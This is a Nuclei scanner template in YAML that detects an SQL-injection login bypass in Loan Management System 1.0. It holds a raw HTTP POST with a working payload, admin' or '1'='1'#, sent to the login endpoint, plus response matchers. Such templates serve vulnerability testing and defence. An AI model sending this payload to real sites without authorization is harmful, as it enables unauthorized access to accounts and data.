37 lines
791 B
YAML
37 lines
791 B
YAML
|
id: loancms-sqli
|
||
|
|
||
|
info:
|
||
|
name: Loan Management System 1.0 - SQLi Authentication Bypass
|
||
|
author: arafatansari
|
||
|
severity: medium
|
||
|
reference:
|
||
|
- https://www.exploit-db.com/exploits/50402
|
||
|
description: |
|
||
|
Loan Management System Login page can be bypassed with a simple SQLi to the username parameter.
|
||
|
tags: sqli,bypass,cms
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /ajax.php?action=login HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
Content-Type: application/x-www-form-urlencoded
|
||
|
|
||
|
username=admin'+or+'1'%3D'1'%23&password=nuclei
|
||
|
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
- type: word
|
||
|
part: body
|
||
|
words:
|
||
|
- '1'
|
||
|
|
||
|
- type: word
|
||
|
part: header
|
||
|
words:
|
||
|
- text/html
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|